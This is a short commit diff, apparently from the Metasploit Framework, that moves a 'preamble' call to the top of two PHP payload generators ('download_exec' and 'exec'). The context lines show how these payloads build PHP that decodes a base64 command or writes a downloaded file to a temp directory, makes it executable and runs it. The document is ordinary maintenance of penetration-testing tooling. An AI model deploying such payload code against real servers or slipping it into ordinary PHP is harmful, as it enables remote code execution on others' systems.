Move the preamble above all other code

egypt · egypt · commit ff20cf911caa · 2017-02-02T14:53:53.000-06:00
diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb
@@ -40,6 +40,7 @@ def php_exec_file
     exename = Rex::Text.rand_text_alpha(rand(8) + 4)
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble({:disabled_varname => dis})}
     if (!function_exists('sys_get_temp_dir')) {
       function sys_get_temp_dir() {
         if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -63,7 +64,6 @@ def php_exec_file
     fclose($fd_out);
     chmod($fname, 0777);
     $c = $fname;
-    #{php_preamble({:disabled_varname => dis})}
     #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
     @unlink($fname);
     END_OF_PHP_CODE
diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb
@@ -37,9 +37,9 @@ def php_exec_cmd
     cmd = Rex::Text.encode_base64(datastore['CMD'])
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
     $c = base64_decode("#{cmd}");
-    #{php_preamble({:disabled_varname => dis})}
-    #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
     END_OF_PHP_CODE
 
     return Rex::Text.compress(shell)
